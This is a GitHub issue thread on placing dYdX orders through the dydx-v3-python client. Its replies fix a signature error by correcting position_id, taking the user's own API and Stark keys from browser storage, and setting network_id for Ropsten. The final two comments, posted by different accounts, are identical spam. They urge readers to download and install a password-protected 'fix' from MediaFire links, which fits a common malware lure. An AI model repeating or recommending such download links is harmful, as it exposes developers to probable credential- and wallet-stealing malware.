### ISSUE TITLE
Working example needed for mainnet with Infura web3 provider

### ISSUE THREAD

**Issue by CrazyOptimist** [dydxprotocol/dydx-v3-python#96]
Can anybody provide a working example for placing orders using the ETH mainnet and Infura web3 provider?
I followed the workarounds in the issue lists but still getting this error:

```bash
python main.py
2021-12-01T17:10:00.000Z
Traceback (most recent call last):
  File "/app/main.py", line 12, in <module>
    job()
  File "/app/sniper/sniper.py", line 108, in job
    place_order(order_params)
  File "/app/sniper/sniper.py", line 69, in place_order
    order_creation_response = client.private.create_order(**order_params)
  File "/usr/local/lib/python3.10/site-packages/dydx3/modules/private.py", line 538, in create_order
    return self._post(
  File "/usr/local/lib/python3.10/site-packages/dydx3/modules/private.py", line 78, in _post
    return self._private_request(
  File "/usr/local/lib/python3.10/site-packages/dydx3/modules/private.py", line 64, in _private_request
    return request(
  File "/usr/local/lib/python3.10/site-packages/dydx3/helpers/requests.py", line 33, in request
    raise DydxApiError(response)
dydx3.errors.DydxApiError: DydxApiError(status_code=400, response={'errors': [{'msg': 'Invalid signature for order'}]})
make: *** [Makefile:4: run] Error 1
```
FYI, I configured my browser to keep my credentials in the local storage("Remember me"), and grabbed `STARK_KEY_PAIRS`, `API_KEY_PAIRS` from there. But it still doesn't work giving me the above error.

Any help would be appreciated!

**Comment by CrazyOptimist** [comment]
Figured it out.
`position_id` field was wrong, which we can get from this request:
```python
account = client.private.get_account(
  ethereum_address='0x0123...',
)
```
It's in the docs but not quite clear yet.
The point is that you will get different responses with and without the param `ethereum_address`, `positionId` can be retrieved only when the param is given.
woohoo! now it works!

**Comment by sxk000** [comment]
> Figured it out. `position_id` field was wrong, which we can get from this request:
> 
> ```python
> account = client.private.get_account(
>   ethereum_address='0x0123...',
> )
> ```
> 
> It's in the docs but not quite clear yet. The point is that you will get different responses with and without the param `ethereum_address`, `positionId` can be retrieved only when the param is given. woohoo! now it works!

when i run this api ,and got a error:

account = client.private.get_account(ethereum_address='0x0123...')

\dydx3\helpers\requests.py", line 33, in request
    raise DydxApiError(response)
dydx3.errors.DydxApiError: DydxApiError(status_code=400, response={'errors': [{'msg': 'API key not found'}]})

then i run aip :

api_key_response = client.eth_private.create_api_key()

got error:

'Field with relationship to another table must match other table'

is it right?

what i can do next?

**Comment by CrazyOptimist** [comment]
https://github.com/dydxprotocol/dydx-v3-python/issues/62#issuecomment-933427662

To explain in more detail:
Login to the dashboard(configure it to remember you for the next logins), and open the browser console, look for Local Storage in the "Application" tab, then you will be able to find out "Stark Key Pair" and "API Credentials".
Use those info for initializing the client, it should work.
Hope it helps!

**Comment by sxk000** [comment]
> [#62 (comment)](https://github.com/dydxprotocol/dydx-v3-python/issues/62#issuecomment-933427662)
> 
> To explain in more detail: Login to the dashboard(configure it to remember you for the next logins), and open the browser console, look for Local Storage in the "Application" tab, then you will be able to find out "Stark Key Pair" and "API Credentials". Use those info for initializing the client, it should work. See [here](https://github.com/CrazyOptimist/dydx-sniper-bot/blob/77d57b560668980dbba345472dfdbb579fbf7f00/sniper/sniper.py#L34) for the implementation example. Hope it helps!

![image](https://user-images.githubusercontent.com/16741479/144950254-4fc9c8d6-09b8-451f-bf55-fc4dc414a401.png)

thanks，i am check it out , but there is no such info ,is there something wrong ?

**Comment by sxk000** [comment]
> [#62 (comment)](https://github.com/dydxprotocol/dydx-v3-python/issues/62#issuecomment-933427662)
> 
> To explain in more detail: Login to the dashboard(configure it to remember you for the next logins), and open the browser console, look for Local Storage in the "Application" tab, then you will be able to find out "Stark Key Pair" and "API Credentials". Use those info for initializing the client, it should work. See [here](https://github.com/CrazyOptimist/dydx-sniper-bot/blob/77d57b560668980dbba345472dfdbb579fbf7f00/sniper/sniper.py#L34) for the implementation example. Hope it helps!

thanks ，i check it out , and get stark key , but there is no API credectials . My account has no money , is the reason that cause no API credectials ? 

![image](https://user-images.githubusercontent.com/16741479/144954236-d56fb3f5-e052-4140-850e-057bd8bece2e.png)

**Comment by CrazyOptimist** [comment]
<img width="955" alt="console" src="https://user-images.githubusercontent.com/55074937/144978001-cbb064d9-7891-4ac2-9e32-3e8201fd7279.png">

**Comment by CrazyOptimist** [comment]
You didn't enable trading (sign the transaction in the metamask) I guess?

**Comment by sxk000** [comment]
> 

OK ，thanks a lot

**Comment by RustyRotom** [comment]
For me this is happening while I am 100% sure my .env is correct. I have created my keys using the retrieve keys method etc.

Placing orders simply won't work using the following code:

`import datetime
import websockets, json, time
import pandas as pd
import os
import dydx3
import requests
import dotenv
from dotenv import load_dotenv
from sortedcontainers import SortedDict
from decimal import Decimal
from web3 import Web3

# dYdX dependencies
from dydx3 import Client
from dydx3.constants import *

load_dotenv()

dydx_mainnet = 'https://api.dydx.exchange'
dydx_staging = 'https://api.stage.dydx.exchange'

web3 = Web3(Web3.HTTPProvider(API_HOST_ROPSTEN))

ropsten_usdc = '0x8707a5bf4c2842d46b31a405ba41b858c0f876c4'

PRIVATE_KEY = os.getenv('PRIVATE_KEY')
API_KEY = os.getenv('API_KEY')
API_SECRET = os.getenv('API_SECRET')
API_PASSPHRASE = os.getenv('API_PASSPHRASE')
STARK_PRIVATE_KEY = os.getenv('STARK_PRIVATE_KEY')
ETH_ADDRESS = os.getenv('ETH_ADDRESS')
STARK_PUBLIC_KEY = os.getenv('STARK_PUBLIC_KEY')
STARK_PUBLIC_KEY_Y_COORDINATE = os.getenv('STARK_PUBLIC_KEY_Y_COORDINATE')

client = Client(
    host=API_HOST_ROPSTEN,
    api_key_credentials={'key': API_KEY,
                         'secret': API_SECRET,
                         'passphrase': API_PASSPHRASE},
    stark_private_key=STARK_PRIVATE_KEY,
    default_ethereum_address=ETH_ADDRESS,
)

# Get our position ID.
account_response = client.private.get_account(ethereum_address=ETH_ADDRESS)

position_id = account_response.data['account']['positionId']

# Post an order at a price that is unlikely to match.
order_params = {
    'position_id': position_id,
    'market': MARKET_BTC_USD,
    'side': ORDER_SIDE_BUY,
    'order_type': ORDER_TYPE_LIMIT,
    'post_only': True,
    'size': '0.01',
    'price': '44417',
    'limit_fee': '0.015',
    'expiration_epoch_seconds': time.time() + 120,

}


order_response = client.private.create_order(**order_params)
order_id = order_response.data['order']['id']`

@CrazyOptimist  would be amazing if you could help me a bit here. Basically been staring at this and the docs for four hours now. Also really cool you shared your sniper program online.

**Comment by CrazyOptimist** [comment]
The error is from the Ethereum mainnet or Ropsten network?

**Comment by RustyRotom** [comment]
> The error is from the Ethereum mainnet or Ropsten network?

I get this error from Ropsten. I basically first want to do some testing there before playing around with real money. The account I am using has already placed trades through the web application.

**Comment by nikotsakiris** [comment]
If you guys are using a ROPSTEN account the problem is that when you authorize the client the network_id default value is 1 which is for the mainnet option. So on your client initialization just specify: network_id = 3, and the problem should be solved :)

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
